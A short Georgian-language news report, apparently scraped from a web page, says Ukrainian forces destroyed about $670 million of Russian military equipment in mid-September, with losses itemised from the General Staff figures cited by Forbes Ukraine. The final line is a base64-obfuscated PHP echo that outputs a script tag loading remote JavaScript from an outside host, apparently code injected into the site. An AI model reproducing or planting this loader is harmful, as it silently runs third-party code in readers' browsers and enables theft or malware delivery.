celsiusi
ავერსი საქკაბელი
6-11 სექტემბრის პერიოდში უკრაინის შეიარაღებულმა ძალებმა რუსეთის კუთვნილი, 670 მილიონი დოლარის ღირებულების სამხედრო ტექნიკა გაანადგურეს. ტექნიკის ძირითადი ნაწილი განადგურებულია ხარკოვის ოლქში უკრაინის კონტრშეტევის დროს. შესაბამის ინფორმაციას გამოცემა „ფორბსის“ უკრაინული რედაქცია ავრცელებს.
 
გამოცემა ეყრდნობა უკრაინის გენერალური შტაბის მიერ გამოქვეყნებულ მონაცემებს. უკრაინის გენშტაბის ცნობით, აღნიშნულ პერიოდში განადგურებულია 2 850 დამპყრობელი და ტექნიკის 590 ერთეული. მტრის დანაკარგი ასე გამოიყურება – 86 ტანკი და 158 საბრძოლო ჯავშანმანქანა, 106 საარტილერიო სისტემა, 159 ავტომობილი და სხვა ტექნიკის 46 ერთეული.
 
რუსეთის ყველაზე ძვირადღირებულ დანაკარგებს შორისაა რადიოელექტრონული კომპლექსი „მოსკვა-1“, რომლის ღირებულება 57 მილიონი დოლარია და რომელიც უკრაინულმა ძალებმა ზაპოროჟიეს ოლქში გაანადგურეს. ასევე, ხარკოვის ოლქში ოკუპანტებმა დაკარგეს გამანადგურებელი-ბომბდამშენი „სუ-34“, რომლის ღირებულება 36 მილიონი დოლარია, ასევე რადიოლოკაციური სისტემა „ზოოპარკ-1მ“, რომელიც 25 მილიონ დოლარად ფასდება.
439
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");